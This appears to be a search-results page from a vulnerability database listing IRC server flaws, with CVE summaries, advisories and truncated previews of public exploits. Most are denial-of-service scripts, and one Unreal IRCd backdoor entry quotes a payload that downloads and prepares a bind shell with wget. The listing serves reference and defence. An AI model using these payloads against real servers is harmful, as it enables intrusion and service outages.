163 matches found
CVE-2015-5290
Removed by vendor...
PT-2019-7189 · Ircd Ratbox · Ircd-Ratbox
Name of the Vulnerable Software and Affected Versions: ircd-ratbox version 3.0.9 Description: A Denial of Service issue exists in the MONITOR Command Handler, allowing remote attackers to cause a system out-of-memory event. Recommendations: For ircd-ratbox version 3.0.9, consider disabling the...
Code injection
The mauthenticate function in ircd/mauthenticate.c in nefarious2 allows remote attackers to spoof certificate fingerprints and consequently log in as another user via a crafted AUTHENTICATE parameter...
CVE-2016-7145
The mauthenticate function in ircd/mauthenticate.c in nefarious2 allows remote attackers to spoof certificate fingerprints and consequently log in as another user via a crafted AUTHENTICATE parameter...
InspIRCd < 2.0.23 'm_sasl' Module SASL_EXTERNAL Authentication Spoofing Vulnerability
InspIRCd is prone to an authentication spoofing vulnerability. Copyright C 2017 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software...
UnrealIRCd SSL Certificate Spoofing Vulnerability
UnrealIRCd is an IRC service program. A security vulnerability exists in UnrealIRCd SSL certificates that allows an attacker to spoof valid certificates...
methane IRCd 0.1.1 - Remote Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8038/info Behamut IRCd has been reported prone to remotely exploitable format string vulnerability. The issue presents itself when Behamut is compiled with DEBUGMODE defined. Reportedly a remote attacker may send maliciou...
DALnet Bahamut IRCd 4.6.5 "SUMMON" Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1404/info Dalnet ircd is a server for a popular internet chat application, IRC Internet Relay Chat. The implementation for one of its features, the summon command, has a hole which could grant an attacker remote access on...
ircd-hybrid 8.0.5 - Denial of Service
No description provided by source. !/usr/bin/perl ircd-hybrid remote denial of service exploit for CVE-2013-0238 quick and dirty h4x by kingcope tested against ircd-hybrid-8.0.5 centos6 please modify below in case of buggy code. enjoy! use Socket; srandtime; $exploitingnick = hybExpl...
Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/581/info Ircd hybrid-6 up to beta 58 has a vulnerability which can allow remote access to the irc server ircd. In most cases this attack results in the attacker gaining the privileges of the user 'irc'. This vulnerability...
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
No description provided by source. FiSH IRC encryption evil ircd PoC exploit. Abuses CVE-2007-1397 Bad ircd, nasty bnc provider, nicknames over 100 char -- ruin. Runs arbitrary code which which in this case shuts down irssi. Tested on my own compiled FiSH with irssi/fedora/x86 There are a lot mor...
ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10572/info A denial of service vulnerability exists in multiple ircd implementations. This exists because of an issue with the deallocation of buffers used by rate limiting mecahnisms in the ircd. This could result in...
Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan
No description provided by source. !/usr/bin/perl Unreal3.2.8.1 Remote Downloader/Execute Trojan DO NOT DISTRIBUTE -PRIVATE- -iHaq 2l8 use Socket; use IO::Socket; Payload options my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x...
Mandriva Linux Security Advisory : ircd-hybrid (MDVSA-2013:093)
Updated ircd-hybrid packages fix security vulnerability : Bob Nomnomnom reported a Denial of Service vulnerability in IRCD-Hybrid, an Internet Relay Chat server. A remote attacker may use an error in the masks validation and crash the server CVE-2013-0238. Please note that due to the previously...
ircd-hybrid 8.0.5 - Denial of Service
ircd-hybrid 8.0.5 - Denial of Service !/usr/bin/perl ircd-hybrid remote denial of service exploit for CVE-2013-0238 quick and dirty h4x by kingcope tested against ircd-hybrid-8.0.5 centos6 please modify below in case of buggy code. enjoy! use Socket; srandtime; $exploitingnick = "hybExpl"...
ircd-hybrid 8.0.5 Denial Of Service
ircd-hybrid version 8.0.5 on CentOS 6 denial of service exploit. !/usr/bin/perl ircd-hybrid remote denial of service exploit for CVE-2013-0238 quick and dirty h4x by kingcope tested against ircd-hybrid-8.0.5 centos6 please modify below in case of buggy code. enjoy! use Socket; srandtime;...
ircd-hybrid 8.0.5 Denial Of Service
!/usr/bin/perl ircd-hybrid remote denial of service exploit for CVE-2013-0238 quick and dirty h4x by kingcope tested against ircd-hybrid-8.0.5 centos6 please modify below in case of buggy code. enjoy! use Socket; srandtime; $exploitingnick = "hybExpl" . intrand10000; sub connecttoserver $bool =...
ircd-hybrid 8.0.5 - Denial of Service
!/usr/bin/perl ircd-hybrid remote denial of service exploit for CVE-2013-0238 quick and dirty h4x by kingcope tested against ircd-hybrid-8.0.5 centos6 please modify below in case of buggy code. enjoy! use Socket; srandtime; $exploitingnick = "hybExpl" . intrand10000; sub connecttoserver $bool =...
Charybdis IRCd m_capab.c Denial of Service
The remote host is running a version of Charybdis IRCd that is affected by a denial of service DoS vulnerability. An issue exists in the 'CAPAB' module in 'mcapab.c' that causes servers to improperly handle negotiation handshakes. An unauthenticated, remote attacker could exploit this issue with ...
ircd-ratbox m_capab.c Denial of Service
The remote host is running a version of ircd-ratbox that is affected by a denial of service DoS vulnerability. An issue exists in the 'CAPAB' module in 'mcapab.c' that causes servers to improperly handle negotiation handshakes. An unauthenticated, remote attacker could exploit this issue with a...